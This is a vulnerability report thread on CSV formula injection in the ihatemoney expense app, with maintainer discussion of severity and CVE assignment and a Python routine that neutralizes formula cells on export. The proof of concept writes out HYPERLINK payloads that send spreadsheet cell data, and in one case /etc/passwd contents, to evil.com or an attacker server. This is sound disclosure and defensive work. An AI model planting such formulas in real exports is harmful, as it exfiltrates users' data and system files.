Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in spiral-project/ihatemoney
Reported on May 7th 2022
Description
Formula Injection/CSV Injection in "For what?", "For whom?" & "How much?" due to Improper Neutralization of Formula Elements in CSV File.
Proof of Concept
1. Visit https://ihatemoney.org/ and start your demo application, then click on "add new bill" at the top right. In the "what" field insert the payloads below.
2. Payloads:
=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")
or
=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "poc") // & Start your python server or Netcat listener.
3. Then go to the settings option at the top right and scroll to the bottom to the "download the project's data" feature.
4. Select "CSV" in "Format" to download.
5. Open the downloaded CSV and click on "POC" or "Error fetching info: Click me to resolve."; the user will be redirected to evil.com.
PoC video
https://drive.google.com/file/d/1ApQhaTIazCqZw1E8i3lOCV4IKkgNBX49/view?usp=sharing
Impact
Successful exploitation can lead to impacts such as client-side command injection, code execution, or remote exfiltration of contained confidential data.
I tried this and the output CSV contained:
"=LIEN.HYPERTEXTE(""http://evil.com?x=""; ""hello"")"
"=HYPERLINK(""http://evil.com?x=""&A3&"",""&B3&""[CR]"",""Error fetching info: Click me to resolve."")"
Formulae don't trigger any link in LibreOffice or in Calligra.
I even tried with =ACOS(0,12)
and opening it in LibreOffice results in the formula text being shown. In Calligra, the cell is displayed empty.
I don't have any other spreadsheet editor to test, but I guess that this is related to CSV loading in Google Docs, so for me, it's invalid.
Hi @admin @maintainer, it's completely working, as I have tested it in LibreOffice. So I am attaching the zip file containing the CSV file and PoC video performed in LibreOffice: https://drive.google.com/file/d/19eP60acGZYvXBU2hWjzFFOWpDqOrQOj1/view?usp=sharing Please recheck and confirm, as it's working in LibreOffice and Google Excel sheet.
Here you can see both payloads =7+7 and =HYPERLINK("http://evil.com","Click for Report") working fine:
=7+7
=HYPERLINK("http://evil.com","Click for Report")
OK, so as shown in https://plik.root.gg/file/Lx42qjil4dwYIE1J/Y1mJEF00TuXbYNwS/Peek%2008-05-2022%2016-30.mp4 I've had "Evaluate formulae" unchecked, but I don't know if it was the default. However, is there a standard way to escape formulae in exported CSV?
@maintainer It seems like it's not working with "LibreOffice 7.3.3.2"; it seems like LibreOffice has applied some security measure against CSV injection in this version. But other versions are still executing, as just shown in the PoC video, which is the default in Ubuntu 20.04 (most recommended Linux), as the application is working as an agent. Please check this reference report for further impact. Reference Report
However, I'm not sure about such a feature as "Evaluate formulae", as I haven't changed anything. But as it's also executing in Google Excel, the application is surely vulnerable.
For a standard way to escape formulae in exported CSV, please check the provided reference report. They have validated the report and applied the fixes as well.
@maintainer @admin Can you please go ahead and assign a CVE for this vulnerability?
Also, @admin @maintainer, the severity of this report is not low; you can see it mentioned here: https://nvd.nist.gov/vuln/detail/CVE-2022-22121 Base Score: 8.0 HIGH, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
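On the maintainer's question of a standard way to escape formulae in exported CSV: the usual neutralization (OWASP CSV-injection guidance) is to prefix any cell that begins with a formula-trigger character with a single quote, so the spreadsheet reads it as literal text. The following is an added illustration written for this thread, not code from ihatemoney or from any participant; the column names and the bill rows are constructed, and the payloads are the ones posted above.

```python
import csv
import io

# Characters a spreadsheet may treat as the start of a formula
# (OWASP guidance): =, +, -, @, and a leading tab or carriage return.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return a cell value that a spreadsheet will read as text, not a formula.

    Non-strings are returned unchanged (numeric amounts stay numbers). A string
    starting with a trigger character gets a leading single quote; the known
    cost is that benign text such as "-refund" also gets the quote.
    """
    if not isinstance(value, str):
        return value
    if value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_bills_csv(rows):
    """Serialize bill rows to CSV text with every cell neutralized.

    Quoting alone does not help: the thread shows the exported cells were
    already quoted and the formula still ran, because the importer strips
    the quotes before evaluation. The prefix is what stops evaluation.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["date", "what", "payer", "amount"])  # constructed header
    for row in rows:
        writer.writerow([neutralize_cell(c) for c in row])
    return buf.getvalue()


# Constructed sample rows: the HYPERLINK and =7+7 payloads from the report,
# plus a benign entry that happens to start with "-".
SAMPLE_ROWS = [
    ("2022-05-07", "groceries", "alice", 12.5),
    ("2022-05-07", '=HYPERLINK("http://evil.com","Click for Report")', "bob", 3),
    ("2022-05-07", "=7+7", "carol", 1),
    ("2022-05-07", "-refund for dinner", "dave", 5),
]

if __name__ == "__main__":
    print(export_bills_csv(SAMPLE_ROWS))
```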
We do not currently automatically assign CVEs against Low or None reports. If the maintainer provides us with a CVSS vector string, we will happily assign and publish a CVE.
The severity assessment is solely up to the maintainer, and we do not take a position on this.